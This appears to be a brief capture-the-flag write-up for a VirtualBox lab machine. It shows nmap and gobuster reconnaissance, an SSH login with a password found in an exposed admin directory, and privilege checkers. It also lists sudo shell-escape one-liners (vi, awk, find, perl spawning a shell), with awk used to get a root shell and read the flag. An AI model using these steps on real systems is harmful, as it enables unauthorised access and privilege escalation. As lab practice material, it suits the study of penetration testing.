[*]
1. Nmap scan
oot@hostmachine:~# nmap 172.16.16.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-23 17:58 CDT
Nmap scan report for localhost (172.16.16.11)
Host is up (0.00013s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt
MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC)
[*]
2. Ran gobuster
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
root@hostmachine:~# 
root@hostmachine:~# gobuster -u 172.16.16.12 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://172.16.16.12/
[+] Threads      : 80
[+] Wordlist     : /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] User Agent   : Linux
[+] Timeout      : 10s
=====================================================
2019/04/23 19:15:18 Starting gobuster
=====================================================
/.hta (Status: 403)
/LICENSE (Status: 200)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/img (Status: 301)
/js (Status: 301)
/mail (Status: 301)
/manual (Status: 301)
/server-status (Status: 403)
/vendor (Status: 301)
=====================================================
2019/04/23 19:15:20 Finished
=====================================================
I need to change my password :/ 12345ted123 
**found in hidden /admin dir**
[*]
3. SSH'd into 172.16.16.12 using user ted, pass 12345ted123
[*]
4. Found no interesting files. Uploaded priv checkers
unix-priv-checker | grep WARNING **found some users can sudo without passwd
LinEnum **no results**
linuxprivchecker ** found escape sequences**
    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
    awk-->	awk 'BEGIN {system("/bin/bash")}'
    find-->	find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    perl-->	perl -e 'exec "/bin/bash";'
[*]
5. Attempted awk 'BEGIN {system("/bin/bash")}', no luck. Luck on awk 'BEGIN {system("/bin/sh")}'
[*]
6. Capture flag
# cat flag.txt
_________                                  
|  _   _  |                                 
|_/ | | \_|.--.   _ .--.   _ .--.    .--.   
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ 
   _| |_ | \__. | | \__/ | | \__/ || \__. | 
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'  
                 [__|     [__|              




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}
[*]